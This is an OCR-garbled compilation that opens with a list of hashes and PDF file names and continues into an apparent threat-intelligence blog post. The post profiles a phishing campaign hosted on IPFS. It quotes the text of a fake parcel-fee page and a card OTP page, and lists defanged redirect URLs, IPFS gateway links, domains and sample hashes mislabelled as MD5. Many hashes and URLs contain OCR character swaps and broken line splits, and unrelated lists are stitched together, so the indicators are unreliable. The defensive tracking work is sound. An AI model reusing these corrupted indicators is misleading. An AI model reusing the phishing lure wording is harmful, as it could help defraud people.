5A39F885D230E41E876BD7B4DC127143 25113113235.pdf 
2C5C47C5DFBB402B235669A19D2414A4 25287545664.pdf 
FEB7F4CC16FCD8E44228957DC824B955 26667812882. pdf 
1F85DE9AE45F522406BE8987EDE93181 26938695486. pdf 
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B615646E1A0E05D498141C72D9BDB086 27160090611.pdf 
F9216697756024D30A521785B289288A 27572976263.pdf 
56A6A24439331D48A2C9C3B6F570241B 27751569303.pdf 
9114B9659107251815BAE5E370AEE521 29490266026.pdf 
C3694D3870DF87D08C0496CB661154FB 30004381634.pdf 
B38094C9BC65FB6343F59BB3A130CB1D 30592917019.pdf 
7F99C5F6518B108ACFC4A2E467CCOB87 30602802335.pdf 
5428CAFA77027067AB884629F505A5D9 30748908935.pdf 
7E5E2135615554C27453AAD7B1A678EF 31225466521.pdf 
D3F0D24375DB70EBBE8EA038D217DBC7 31938967008.pdf 
6FF9D1781AE714876DD3580411AB7ACF 32254341335.pdf 
84EFCCC1F53EAD66E85A560E96851117 32393228056.pdf 
017731B0A64C89AD93CAB89E7E60F47C 33397258482.pdf 
C48AA44D8A9A4B1ED191B8A5A325E7C7 33987696728.pdf 
9C81B5DD618E8FA2C621E2FC4FFEF794 34128677256.pdf 
56D8DFD5C5998A9AD54EDD6B15870EB1 34270899382.pdf 
FDD52BCD91FFDO5CBAFE2DAD121A5FEF 35034639506. pdf 
CDO05EE764ED3EAEC7D316B236B6CEB4 35532735673.pdf 
E8D1B9F198CD2D0830D2F6C37B687D78 35848063192.pdf 
B5DBD44CA0DE7A093069635659D61C01 36254620596. pdf 
E29FBC13ECBEC487B2EEA80C93AE8579 36305895679.pdf 
55BF7695FECEA6D10134BB9CO7FD6A31 37175442866.pdf 
OCDBDE8BE4FF5C4073C2F9D6D1E611B1 37846248199. pdf 
15968137306B287CAFDBA85916A1BE5C 38227904768.pdf 
69DC69862D969FAB1E349102DD94ADD6 38670953669.pdf 
803F22AA33B40C2FOBDB6B25A16E3684 393526607 70.pdf 
B6CBD98D34ADBA0FAB5A38C52CD01547 39456879426.pdf 
5E80A6D882AAEB86709DD2611A251FF4 39651425770.pdf 
FCEFE58019233EAA6EF5CD83727F40FC 40271792214. pdf 
5B97DD0747E7EE81549BD67137A94F4C 40717989377.pdf 
A6CC2DE5E257989A9F3B8B3661678CFE 40909229408. pdf 
OAAECB80BE4546EB47644529F4990BB7 42235242507.pdf 
5B5CD32AB0AA5645B37E66C08054E894 42791686638. pdf 
1DA9CC9BC1F440797660981673D6A8CO0 42929172044.pdf 
DE011F2246D6C5C760DC64BC9686384A 43555346587.pdf 
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132F2F55F8C37ACA2E507662633E55F7 43655782866.pdf 
C4B746D141DD85C3D4E180FB4C321EB7 43693913284. pdf 
4AB5BDD11836160AD1A002F1DBF66344 44524825310.pdf 
4CFOFEF268B949566E99F8F196B75A2A 45453061496.pdf 
7D5301DA81F5D2F71D925FA26D3D6E23 45691664148. pdf 
B3A9971FBB3CCC4AB62EED96C6F65277 45829389524.pdf 
4AFAF3DBF100EFFCC6E586D8A3E61D1E 47577473045.pdf 
FFO04B0A143D072F57C151DE23D1DABD0 49494005888. pdf 
CCF617937AABBF27A14EE440AECEDE6E 49834067643. pdf 
B158D6E868131FBB511215DE1F7C43A5 49907284246. pdf 
A8CC11CB5EC85076B5AF16B26CDFF524 50726467133.pdf 
1EEB9B17F7F13DF4E06A46058D6AD847 51845523569.pdf 
F744246A7B062F565BF2CE4D2EA9CC19 52700027443.pdf 
535A660198A21E5C2FEDA64A904BD4FA 52725579741.pdf 
0FB97A032D0936289BBFA31C9C125BCE 52870241943.pdf 
CE884CC8DOB1BAE6F8A26A3945249198 53078768096. pdf 
594556D9CA86C1F93AC82B73A5CA79BA 53244069586. pdf 
BF1361DC6B1633A44DC25C12B1EE4040 53308812845. pdf 
98F61E53BC66885FD2C761003719D1E8 55364009919. pdf 
12DB69C85B1CB8A958846F732CCE38B5 55800489465. pdf 
53477A6FC342E6204E7E571B826D1B93 56100490220. pdf 
03EC48B3736EC25622E58C1881427C02 57761720675.pdf 
4B1A116CF77055BBE288A60DBF2DEDF5 58962661931.pdf 
8BB074AB88F263E72EFE29E95DDF8CE7 59657813613.pdf 
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3C724E2E7C84868C5F4D67ABFABBBE89 xajemavajosuxemepawamalob.pdf 
40D4A927A0E086431ACA5C2085E64044 xajeseniravudum.pdf 
8EF15BC5EBEB99F30DEA0443FCD6EC44 xaligokubogilegerewit.pdf 
E5C951D7D00F82257848D9B32C2CAB69 xanona.pdf 
8EB3C48DA38BE3A5B6134FB81248D6FA xegozanu.pdf 
7FD6EC1EB5183A0C1F1AD7787BC88866 xegukiguwipemagepamipi.pdf 
3676B2436F5DC22024E0B9120AFB30BD xelaperepef.pdf 
2808A6181A41B5B530D09FC9793F1872 xikupigivemuvu.pdf 
3D8C2D8BD1984B4054C10232197B00A3 xogipopoferixavaferov.pdf 
D751706B295A39AB430D08AB8941F4A5 xolawukixemojakedape.pdf 
A44FE0258F26C5C5BD6F47E7AC841383 xumerozitazefiwil.pdf 
D7506730A7858D5B293B9F54DAFCOE91 zegolorufula. pdf 
B79AE9AB464594F348B37F1E83FC991A zemuzafosodomebonudomuvat.pdf 
388FB0258DA09D8C9922AAAA1BB721D6 zetewafolajepugo. pdf 
56D3AD953D817869D766AF5F7E10CA55 zifefavix.pdf 
3C402B886B6E4C0BD8CC89312687B455 zivawore.pdf 
10C54DA100008DA2E4B11F53C220D762 ziwukoxib.pdf 
A629DF34D816C4B0ABB81D7A61A86FD7 zizal.pdf 
5513B8A5636095F4AFD591525ECD72BC Zzolijorakozone.pdf 
8E8151279699A3DF787731FA3226930C zomenuduvokag.pdf 
A07587C5E7E01CBF1AFAC7A469E5AA35 zoreveniwivopopalu.pdf 
1F33F74DA311FABOEA269FD65 7028409 zuludajafikoraketojesafaz.pdf 
3A5C49EFOEE9090979E902ACC936BAD0 zunanegewafo.pdf 
FCCFA12EQ0AD95A7E5CC62E2355160CF5 267343834.pdf 
EOADAA6C8DE2FA8CBC434A3D0475E8F2 974628066.pdf 
CA9D188A3ED0984F5787535ADACF5EFA 985373609.pdf 
11F9E844F718A30AEC3AD7BB39F984C9 1012580328.pdf 

Stay tuned! 


y 
1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEi0toPrGr1Brmf 18iXXhjXBEJ3NCjcDf£W190_ofLIqN9igx4 
Dv IOOUCOALrKVGCOo9QgzCh9sNttzmJ6djy3CEXNG8i81XDHM6hri 
2. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVvXsEgbk2LS3gt08v jDnxASBqAxcU17vJKqmBwYhVYUkIJMA36vt6 
6qVOm3n0xB-bbG2eWeWtfFe-vy3kKbK1lqmGvjv_9-YMFj_bEvy0QqTR 


o 


sSButxJU1QnmLYF6sTeHVN8N4osyKrbWuMuBCxrMpcaVs j5pQRDR 
4. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEhHJ7 2HrN9kKOEZkHot dUQK2-mYtWLJHRTq7KAKtmhNUBaNh 
66kQ-RODIZPSEUWZ07NbW1iyRSIGTD9nR4IbslguD60DGLXtfHDXcM 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgqdGbbYA j 96hb7Z7 JYYFMwqOutDK2 jRM_zMGnUpcAG1tYXO 


Z3aVZ3tK37cTL7 jnOYf toxoH431qkdytEgFrcE_FvwWj£DT1JS74w0 
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https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEhE9m2b3hRbPk4- 4gi UOLLW5HVVUWZ6AMzVdtKrSqzaEEk1s 
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19.3.2 Clustering Phishing Campaign’s Rogue and Fraudulent and Malicious Hosting 
Infrastructure Pointing to Massive IPFS Web 3.0 Hosting Infrastructure Abuse 
- An OSINT Analysis (2023-03-04 18:24) 


[1] 


C 08 trustwave-ibank.com a % eu 


GF OTRRA , 


Dear blog readers, 


I’ve recently stumbled upon a pretty interesting phishing campaign including the actual hosting 
infrastructure behind the campaign where I’ve decided to share my findings with everyone in 
particular the fact that the campaign including several other which I'll profile in this post are 
currently hosted on Ipfs’s Web 3.0 infrastructure. 


Sample screenshots include: 


[2] 
26695 


€°C O B Mtps-/iwedink.com.aw/DhYshippingtorsion/index.phip fed s = 


A delivery attempt falled. 


We could not deliver your package due to an incorrect delivery address. 
Please confirm your address and pay your shipping cost 
to receive your package. 


Charges applied: $1,99 


* thes action must be Completed mitnin 14 Gays. 


CONTACT AND SUPPORT LEGAL ALERTS About OH 
Help and sepport Terms and conditions Fraud Awareness. News 
FAQs privacy Notice Fraud support Careers 
Contact Us Iergortant infoemation Legal notice 
Red a location 


rocowus Ov @ @ 2022 © Deutsche Post AG - All rights reserved 


[3] 
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> 


08 webdink com.au 


Enter the one-time password 


Marchand: OH ternat 
Amount 
Card Number » 0008 :0008 xxx JOCK 


confirmation code 


Hi, Hf you have any questions 
about your order, I'm here to help! 


Sampe URL redirection chain: 


hxxp://trustwave-ibank[.]com/I/LiinkedInhardest/900/ -> hxxp://kit[. ]fontawesome[.]com/585b05125- 
1[.]js (b5a82299925ac96a1454732ab97f2bb5) - 104[.]18[.]23[.]52 


Related MD5s known to have been dropping the same identical phishing infrastructure 
javascript obfuscation script include: 


00666c31b9016602ffe0eae49a5e4ee5d4a079ad101c8e70aalcdd2295e3937f 
009710a0792b2f8dda23bee9f79644b3b19d092962d09aec19eff04d217d1f94 
01db44f671d5b9e2ed3ca4a7f2e9d58d9887fd28d54d5b1d531el14ba8df47f6be 
03026db9bd10d9d980923a457f2774497a34c96bealebf7cb74f13383af2271c 
03763ee4d8e0d5e495fc8966702f3933f8f1547b25804038ab89acab01cb67df 
03c186b5d249f5c9ded786871d5cc99130ce8c24c54bf8151868ee03c2db0aba 
04527364ea88ac8a81laf4e4c0dal3221fc31fac2d17ff73e1llecdaa8975b9596 
0497603023cec2168783ec0a9d29e5b9f0d3e40e6b832b205892fcab82bbd0ed 
04ee5db7857c070cde6a99962fd7 1d9d0f4bf5a23a5203605b0f23e10de649d3 
067e21f3b35b0fa5ac87c47b6b87b3f5e8f14928e8028fba92b79a29c404a84d 


086d54913106d49ceced058de30b80732cb57b68b9bflad75e0535fe48a737f8 
26697 


099afbc81e7c19775fc09a26d75b10997e36ae0fe23dd078c131a963fce15896 
09cdc9b2be4d497beb6c3392ff2cdc8a2145498a568110c99cb2d285945d8a3c9 
0c5cd0f3718725137d566f1892ff4c3aaa4ef31dcec98ca932f7315306352144 
0d5aa9847cb1cada491651830baf32a7b255464bcal4fc787663a55cdb02e3c6 
Oecld2ca6f2f015f2440cf6b16ec8fab91208b23524d93f77b7734189590abc7 
Ofb5d884ea6cde5c7b4bb5ae590a0971f7cb2ae6e9d110d89b1c57b006d13a81 
11c6248d01c2c52fd93f4e16 7 6ede5afe332b32303db5e4d4b813285c2fc2a25 
11cb76d18eb86a1a55b2d6d0da43c361501a67826b9bf43b7 74a5bfbf3b6a203 
12c6flf85e3a0bae45al3e8fa70c37a35782fd8ed4a05eb35e4704c0a0e09105 
12f06ca666f09b7dda09f399896024e3344fe19d243dacd7eb2698ca9bb94530 
1300a1f6e068d2362b958a53ee4ded3e6ed7b63b04649d3f8a708d8ce5e33ca0 
14922a4bc2884913ab6e57b1965e82181b06cac1b6261c3a16475a4fbd3735ce 
15449d0dc1b76471fc269cdaa37d2e5f10fb812f417d5d271b7aefc63e6ae137 
15ac93c9c5be20926f8b58084d71900c3e846abaf053a54bee19db41a6c709da 
15ff4la7b686de66a8cb47dbf37006966dd81b5148ca352532b605551a0c6a0e 
1806f6e00b38287c20d58104a7d3728223e4171f57f3b36844e178d44995dcOf 
1846902858f655ea58b601568aa80ecbflb54bceba87875dd01dccad75918e36 
1882falbed2a53a486dc07f4eb1858e6b9233402ef0f7b475246102189e8a405 
19915d17f3bb2c2f6cba6d7c8f70fdc1d3793d811d5d6ee21e9253b17fc24cla 
19ecf0308f99a39fcc1124c6b67a486f43b10460e4810eef69089267d69edb09 
1a0b8de3d820d16121d6435726b496bd281b2537e83b2ee8ec5fcceb87f2a623 
1ab79910d98dalafabe2e982392b5c71ba5a28d6396cb5d495 70f0bc06b595d2 
1c7cf6889ff637ed4d2148122235f9b44367d3b1ba4305ae2b2e126ba26147c9 
1d94581a181cd2c1be0d6329936c715a6cd39fb2a09d912de95699c37527ae41 
1dd547317b93f57528fa914c0cf791eeb396736fe8876132680cc39f3dc77d2c 
1e85b60b46b9683a64e466785a5bf429025aa651cf7a84765740eef7/deffaf8d 
1eb4424393a6f3846816f47cf68012de2f8407d5b1f9a93f67c1b620f3eab3de 
lec05ec963b867ad5df3e8deba62ac3d35b5ec8d5064fc541f848a863dedfd6e 
1f9123ec02d098965c87ff2d24ab0b1b6bebflee5be4505896717f5b8762c924 
2022f9b2f554dd627190f25f3873e9bc83ae3a8222f8cbeeb3944cal4c5a78b0 
205c0eac682985f26e8e0a365dbd7341f9b14ca7c43f0c969da861f0163bffdc 
20b9787348f3c6cf47aa38e61125563adc32fa5d849c87f7409b60e23c59f510 
212a8b969ddc4dee979b49c95255fcc6a7ef8c53c61f3298730a69ae7 24d239b 
215ff84fb3036e712bd0d12f088ee233153f4fb12508100e08230372e33d44f2 


216748624f3a1e051a500d58ba040da5f8b2ea70a8532b6d088b1a2c07b75ecc 
26698 


21e9c9d74b660ea8bf9cf36e7dfd436df609392127a7fd2d25e4a73eda7e6ca6 
222b8e161cbc5fba915d20ed6c3f0c6f7526ca97890d8c24597ce545b1e212fb 
232ecd1594f1bc189386283aec3f58a0faeccaldd1104c80a65b54a379716c87 
2337b867ba75be2ec6f1875c936c334e690e70803836f228218b373c59af2Fcc 
2468c116fbc5bb5d655cffeffd719713ae452acdle3c78bd2c9feb095cd5cbe8 
2490346bab166bda27784aeb6abfb901ec8c31886352d977c5d0536c678b43fc 
25add11d66040c5756d6elcee59bc3e9c5ecd14ca4dd5b0c9ed991b933898c07 
25f587f9293cf6df19255c64eb29614331201b3b47072195ee0cdda55826d534 
2663c11155339c9da783a558efa38c25f428aa86bb5399c25fleb1d25e732f97 
26819f449dbfd75ebf2bbb5b6cf21229fd938d057771a9fd74ac28409111d2a0 
26b2c8ceb1d451d1e93ff1c6229b777e77616abd07b64bac2559c18af267f1c2 
29344e7092d7812f3e3d66223245b28258cceca3aef7450446094f2a4afe43a6 
294a220cfa3675df66875b81e671600b72a00089bc7fc533c38bba972b83dF40 
2a48ea40bda49df5299b61352a8517844514c737859121308bea23fdb36ef2a2 
2bd621264997b87796442ebd3cef538f513bdd760eeda865b5fa01lbd0c6ae93d 
2cd75ebd673f90ffd220eada6c23a7c3ba6bd65373f2ad21f04e9fe0a3330a2t 
2cf6f97e357019bcde90cfeb07d664c27738ac57c71878274a68b168c1ff362c 
2ddc96ce6263cb86da936ca7bffdafl4ca9fc282bf3191c773e2a2138b59a211 
2ee32b86f64f031ba0ea9c0338e5a05d755afb2f92d6345cfed12869b2b229a7 
2ef37e17c2d4e7bbcaf32dla3cbdd930dee84cc69ad4b5c5b61d7e668371e471 
2f6536cd2911877579d15f06a8cbb9e8alb38b30fbbale02f87656506ed14e44 
2ff46bcd28e4741fa3ccd7168e0bfb3c726feeff9F485009a6136e8c21dc7328 
316d5e87447ff9ae455f39943a3f62754ab8bf59b58ca01e536bdbc35a398cbc 
316dc156b5cbc2667a692e0c4b2872e36fd40a557b56039aale8b78e955aa905 
31a252de3cda5129ee70ad35e122d0c16f8d1588cbd800ad335e93f25852ad32 
32c02dca3807ee08769be869298695c0a6f42a85567184f6041da6798cfa95fd 
32e7e27ee627b7f5f2cc87646806a1dc418e658ab6bad41ee120ce71d97bee711 
33e3bdda78378fc3176e4366fa4307cfa08e6ec5d62a6f4b965ad2cfe98ba24b 
346ab3fde761b60b51e396d9c6f7 3fe422f35cddc15f7df82780c4050b9dabc3 
36b2ebd67e048f439bedb33e715c90f628780654e7cdcb5a0576e568fe8c39b8 
3710fa3fa5f706a79b052f37f0c9e21bbd23d20fb2012be847cf250315181436 
376a64bedc7e8d6765d95b93e820756ca7ef387d24aa45297b1d825d25ecaa0f 
391b3c42a7a085bf8faed2d50d7d27aael15alf02bb9d5fbo2b6addd0b388b8575 
393a47fc36abdb40dca0c284eb095901fb849143789761665ee2598d993bb033 
39587f141a90d4946782c95e75d672932749304aa32dd7fad1d9974f2d691d63 


26699 


3a6e2cadd8d4303ef21e39dcac3d2416cac6b9f514059d8184e7bfllee77b801 
3bed8ab6e4eb5e9ca916bd155906fe707aeldc41c31cl1ce7e796b480196d6a2fb 
3e0169e424bc5395904bcfdf9d0f7 e6f7fafc7d3d197f228fef3e974677deacO 
3e9bba8bal 8dbacae4cé3faff36dbc2d6188c11fe2bad163988718033fce2df7 
3ee695468e4afb12c30e2dc37935828e06d0866637cd572901c88a4d8c211fdb 
3f0323572f48ebac6d75fd67359c580135a30d80a7693b520b9432d9146d86e8 
3fc2b3fae8147f6649aed2a8719b8771778edc048599217d0cd22c5e70d0dc39 
3fd8180a923869ea42540151e384cfcb163d07dedc05b1f9142a970c3dbca614 
3ffe69c9e2e2f8a350f7d2ffee64acf8cffbf390489807b81cf8e4eec87d4047 
4011f7d71001982ea1c6815cbe6e747f19bbee86341d8f2807fefo50e080e84e 
41cab898ef2d99eb5fe129985763228bb1d102dc66842889d1be4a1139aceb5e 
431250db0267a5c5394c50bcdbcb1e34475a185c953f6c7b25489044cb83ebdd 
439c8179f7f16d025a756c5e27dal7a2dd1a38475bcefde51f8a391f7ec30321 
43ec07a0ael1787aed9f382d6f961843c84966ef8669bc7b71c875cd9c17a7a54 
441ca3aad8111e0c425948750485d274575b7fa26e00ddb23c429fd260a9cObe 
447040fdadfb03b1c7883145193596975fd216db539c3079aa0a9ea9fd68a8F3 
44b03e2f300a980f7d8b43a740049913a1513252602dc7de4f4024569ccbfd9F 
44d79abd26345b8bbe8603be4d607f994564e7a96f6444c8799cca8316414947 
451a2fd94d0ac232e8d243f9f4ddad0a1709048a58365a52240d493cb6f26990 
45e7bef47288c638566e1f0906edd51fleeld3dc137539a291d86f983a0c954f 
4676c4353bfbf014021ad1ce7a59f9a863841904a9639f064b9f5b7f0ab6ba0a 
474ec542cc0db502612b2df8df7f06e5d46188cc5c25a19218596af184fddd35 
48b6c7a03efb45af665ala0c291d7ede66560a2da00C957 7dal9bab3ff23bd43 
4aa7eb4a4e1c54d6f990cda0b1789e2bc38028e599bf9 7db72acc137b68a5891 
4bee28337a884c4e60834323630c8c81cefc02ab4144b7d4657817aebea02365 
4d0c99bef69a899989b4fd44524616986fcc5c10346f1b74cbec9e3c0c05293F 
4de00d4f21465260f7d67d3fc829ba7124ab5324def519398dd98fa7 4f675f95 
4e6f0988adc75d578451338397710b3f9e07de7b3530335db64da5f0d9b587b3 
4eef76df493c9cf94149366517ab6bd8bd7f4210b548c2766067f2cb00c1dce50 
4f4cfecce8e006d342624d6df7 7527229fc19a72d62e20b83a58724e2d9309da 
4f57ba579al5bd0bced0el1aa31fdcff9806c007b004e4fcb86532e69e52fd734 
4f9c8e494ef8bcb6f94ebeabd6bab47 76db239778031e1596db370c74a3c94422 
50f60b18f9b006f453512f629112286b804226c82efec01843161e7851137c00 
51be858e35374462a81d6ac2255c62c7aec3eef37f5a25340d8c9602f9fa60bd 


5266c8e3ade83d4aadce4277ddc59dbc68262030e4ad2dd37273c1370aef65f1 
26700 


52c02a0f2d6ada3b0e27 7df6cdcdaeb9e3c232c9cl1ffbfca609a316c93d017c8 
539f252b37e7b1f2b94f513e91f979e026d0a0999d51e09a0624cbbfaaeae479 
53e26d3ea6898d8e6d96336bc0elddad21843e4bdf18876522b4dd26f2fe5572 
53eed8562c117904b218b2ad0976e43b499c7d70a267b377cdd887fad1d3a29d 
55cb6e4d3cca245586ab253f83022aa6480373ee45c62086085515f39a26f318 
55e10e3ac2342c0ac29e8a6007e51c852edfc1218c431369a5b1b0aldd7e2253 
5669950c16d76be24f5394983c2e91d22b6b1582ab1e78699ed533df6dcbc192 
56ae25ec5b26379514f3cb00a72e4964b94173eb369c5f05e34fe749d6e85d2e 
57a02fe0a187a210042ac518f4f55e3452f9bd1aal1680d3ab4437d7ba6c58c43 
57d70632eee9752d450ba8fde366824c5e195c6624c910e272f5d30ccad3766b 
581042b5b9b2b4d37dd670341f556f98791562739b4c3fe3f416e83163051e32 
5863c04d10382cd956f87433d2bd68dcac68eda7c88d7f5970eac64b60b33f73 
586613a2506f708c525ba505a0724217d957987cef748931a0834c36e83adc66 
5958185f009aead056104cf9525882d685d5e739bea465325e21307857270b71 
596eebdb10185419a2e5f5b1836b7d11e472f637f63b0612219bfddeel793d29 
5a98f67175dad747f2b4d3cc7 9bfdfd9fe28b4f2528d1b7f4799d27f62a39231 
5e2c927cOa5b6fdc9884bfle212554942ff72437005f88611e3dc635c0a28a72 
6148471c594ff12e93a4dbe51d0ea958cc590d1852426c656a47e0dc8a95ad09 
6171d9d842177c2519f7d0bfc3982b341b0f6fb9de3d72f09cbb10e991114c17 
61a385620023354b1ed3943c013c283e7ac8e0225090d413el1f15c6edc7b6170 
6200fle6b2c758e70b2e9f2f3166e4ed5f595081a36db3e647ed516272054ee5 
627f1c4522ebd5565d288793080603b32a0cb273d30920038669b50aff38efa4 
62e51d2de62215019d0c9d4a52ad1760cc18644b9679 7ffff90aa887d804ffe5 
62f8c035666fe30325747701cbe7dellcbd2c0094c207ed9feecb76f970683b9 
63df016ec0690ddabd61a6e499a6e01fF48b5d4f46e58d67b581fc22654f9005 
640967 7afc12251078de62c98d0671a6alcelf72217bcc5e084b5f84f8a6c79C 
64232a4dd1719fc9c4a5c7f00adbd4529dec86e5a956e4ba82ff0aa7el5e0f01 
66d77c256b453f9cefed52b35b9c82f95 7f0669316acdce52d24958235c4742e 
66f43fbb336dc9d743759dbe147113645336e62a35ddd0e25cc506blellae86e 
67262c8857e4f6b68673ba61b19c5fc9b81552794c9f2768a92e675cab8abea0 
673722230f682ee92d16e719f85652a34ef13664ab1341d6d49b90b904b4b455 
6764adef097a27375ea4a5921e51dbd8048ff45f10c8ab85d5050433df0b6334 
67b71691690e9cc56ca2e67a6889bfc1c92add9ala7a3c499779F2492d8fedaf 
69b9cce961ce3985c54074aa2c9bc7632969380998078b9c8963ec3031b1bf67 


Sample domains known to have been responding to 104.18.23.52 include: 
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hxxp://bafybeifoiwykvei2k2bk5neozkm3f4gdbh6d2agg27alkqq472q64kfcvul.]ipfs 
[.]w3s[.]link 


hxxp://bafybeiarfn4y7pqaowxql6wbkuhi5izp76feqm5oockodhtskvv4h74kne[. ] 
ipfs[.]w3s[.]link 


hxxp://bafybeieq7yeiaqgp6xqpkxqg3znepungb6taakmmb4343a4wxyp4vq2nikm[. Jip 
fs[.]w3s[.]link 


hxxp://bafybeigvjkqkq3s2sz2stcqjqS5uve206rmiew2occt4bazz62!qbnoj7kul[.Jip fs[.]w3s[.]link 
hxxp://bafybeid2udy66wb3k5tvouvyh5vikzod7jtkniwp3buk4c2rc3vb5p4rja[.Jip fs[.]w3s[.]link 
hxxp://bafybeicdnf6épnveieqgielvgfd4dgfwb4bs3er6tdv54z3ajxiartcgtwza[.]ip fs[.]w3s[.]link 
hxxp://bafybeigxwyg4nnyy62gxpzkc2vker42l4zab3dxmé4taqspiviqxtyxojoyl[.lip fs[.]w3s[.]link 


hxxp://bafybeieoehbi3bozw4rhtadsuw3wizt6or4dm4afhocd52nt2w4mwmcjsi[. ip 
fs[.]w3s[.]link 


hxxp://bafybeiah6u2xz7u7l|gqbrcjx7dkleth7od2ruwb763scrx53uvédyyidte[.Jip fs[.]w3s[.]link 
hxxp://bafybeiarotivhIx6aowgrqr7wwpnph74fsvk7ausj5amtz4lz2tgtsscf4[.]ipfs [.]w3s[.]link 
hxxp://bafybeigno2w5vo3wft7vaiw2emsokkdp3q4fxj6jofuoeki6pr5itmjvxyl[.]ipfs [.]w3s[.]link 
hxxp://bafybeibgwyojlbt5hivhyxftcmdiiwd4xsx24l3zuyintzqdcqlmgtyssm[.]i pfs[.]w3s[. ]link 


hxxp://bafybeih3semybz46v2auyau6bwbb6bmn4vnnadw4ra6pyifniuamwhebdm 
[.Jipfs[.]w3s[.]link 


hxxp://bafybeihg2js6ljraoyz5agtnqwngknvtqzgcexfaqg4ifu5 7s3hmve67hm[. lip fs[.]w3s[.]link 
hxxp://bafybeic4y7xrpjrqp2jubl3btgyjd4vu44xp3t3v2sdyaquxt2oiamiuju[.]ip fs[.]w3s[. link 
hxxp://bafybeibn67lgqdwhfpf3bI5vg7bako3e5x5bj3b5uxm3oxn3lcz7xbrrnag[.]ip fs[.]w3s[. ]link 
hxxp://bafybeicrq3hypfwbpghncpcubit7xrnvfncw34s22jc5u622e6zgit6t5aq[.]ip fs[.]w3s[.]link 


hxxp://bafybeihmtlobpmza7wjzvjsomq6kaestvee20szw2a5pimjhpxtju7p4msy[.]ip 
fs[.]Jw3s[.]link 


hxxp://bafkreialqhpgku766iujjzyvkp5ti52svsidzmxh2m22volxvsqitvxjqil.]ip fs[.]w3s[.]link 
hxxp://bafkreidjv4vdxf7 pI5b2hctutntnapfiorzd3dfcft6t2 3wkbveguyndmn |. Jipfs [.]w3s[.]link 
hxxp://bafybeicwr6xv2jvegkulb7aelxftow6ipqqiyumcrl6yonyvraqjh6isyfal[.]ipfs [.]w3s[.]link 
hxxp://bafybeide2cap7dwaz/7noybtd6rkj75afd2g4ktgndfhoijnm3hixlomzim[.]ip fs[.Jw3s[.]link 
hxxp://bafybeibzdym2xb6sticxgaejsykxj4inc3lisdyecapdv7ursp6vilw54e[ .Jipfs[.]w3s[.]link 
hxxp://bafybeigpvsxliiqn4zrzsvtox7f45w3kxlihnfv 7lauby3pv2pmjbtxb44[.]ip fs[.]w3s[.]link 
hxxp://bafybeif35ymavla27r645kib4tcgve3qIrzubbijzhq3dscrbmcihj6myal.]ip fs[.]w3s[.]link 
hxxp://bafybeiggma2d7/7tefczrifpzSwwvhvw2wrcfko2wdk/7sifdd33kmtc5zrul[.]ip fs[.]w3s[. ]link 
hxxp://bafybeia2h5v7itkdr3c3njrktfxpnucn7hjirxtr2wegy2bawd6muumscul[.]ip fs[.]w3s[.]link 
hxxp://bafybeia5aj45vwoxl3ieojp2ek35c7cjbz6zqp3whlly5zhilcrjz5haqfy[.Jip fs[.]w3s[.]link 
hxxp://bafybeiasmsxxjzhmrgusj3tussufgz6vt6 3nupiv2mvffvz4ksp6yiydf4[.Jip fs[.]w3s[.]link 
hxxp://bafybeifo3sytrpilg 7t2jshaziweqy 7zyk6whzh3quta6jnjbg5v7nslae[.]ipfs [.]w3s[.]link 
hxxp://bafybeif5m3nfcet6xtxuiocna7pesiiepo76apkndx2vry52elx2x7px2q[.]ipfs [.]w3s[.]link 
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puritan-groupinc .cn 
redeye-groupco .cn 
redeye-groupco .com 
redeye-groupinc .cc 
regency-groupco .com 
regency-groupnet .cn 
saturn-groupco .cn 
scope-group .cn 
scope-groupmain .cn 
vision-groupinc .cn 


assurity-groupinc.cn 
cosco-groupli.cn 
mx.cosco-groupli.com 
mx.puritan-groupco.cn 
mx.puritan-groupince.com 
mx regency-groupnetcc 


mx.transgroupmain.cn 


A 


: 222.35.197204 He 222.35.136.0/21 ——“S-ge AS38356 


nsl.dummykeath.ce 
nsi theblackend.cn 
puritan-groupco.cn 
puritan-groupinc.com 
redeye-groupco.com 
regency-groupnet.cc 
rengo-groupmain.com 
stock-groupmain.cn 


transgroupmain.cn 


Parked on 222.35.137.234, registered with emails already covered: 
affina-groupnet .cn 
annuity-groupllic .cn 
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hxxp://bafybeiaemax6uhu6t2ujov3uzdufnbcrdzs7hdwtict4h3ucoxrb4whbey[. ]ipf s[.]w3s[.]link 
hxxp://bafybeifv530wjok44tyv7mcge3kpehmfbdtnpfgof7heik2j7pneg7eai4[. lipfs[.]w3s[.]link 
hxxp://bafybeibew7|k2mf66wa2gi6d3ezutp336vp377c2hiilib4bdzhrji2wvel[. lip fs[.]Jw3s[.]link 


hxxp://bafybeicsrkxc6pvn2nwzd2wivjwf52n2mn52ulmwhrwndbebmlebpfrhpil. lip 
fs[.]w3s[. ]link 


hxxp://bafybeifrq3vagytnbl4uw7hqjvpgdn57pdksuvdg4ovtblsbqrgedk56nm[. Jip fs[.]Jw3s[.]link 
hxxp://bafybeibgivahg2moxn6qoqttk2fokcuvmjhmxxi3bz4tngcjqiyrr2z4vil.Jip fs[.]w3s[.]link 


hxxp://bafybeiftny55ajmwwwzmmyxxjld2aowz66 3iza5ti3raxukknv7bqqnk4q[.]ip 
fs[.]w3s[. ]link 


hxxp://bafybeigbpv4lfshncbqigvnupht3h6tkcmrermyu/ctvfzoqcu62o0shq7al[.]ip fs[.]w3s[.]link 
hxxp://bafybeiaix7ewvyraltg67j2puatg4xllzvoch3phd3hop32rtwn2jn4dcu[.]ipfs [.]w3s[.]link 
hxxp://bafybeigsx3nzfrocrgg5sryqwb3rcfw7g3o0orzug3elm3zk7hjpkablpse[.]ipfs [.]w3s[.]link 
hxxp://bafybeifzbqdck3anxdc52kqt3cztk2fwwmls2y574jd22moifmfsvpcxael[.lipfs [.]w3s[.]link 
hxxp://bafybeidit3 mup6cs2j6zr3ggs6rqyjwwcmm/uahw4izkopn7fihkrdczr7a[.] ipfs[.]w3s[.]link 
hxxp://bafybeie2bfzupd7ak53xz4imo4lytra5dlr74zyshuapokjwlvkltqle5e[. Jip fs[.]w3s[. link 


hxxp://bafybeihlwm5wosfdfep67kpxsposkmfy2pg4ty2y6ovgyqeblc5mtq5rsyl. lip 
fs[.]w3s[. link 


hxxp://bafybeigqbqkmlulrauaxjqsmw2sjvml6ysjmsvgkourxmé6t7gncqiejnum[.]ip fs[.]w3s[.]link 
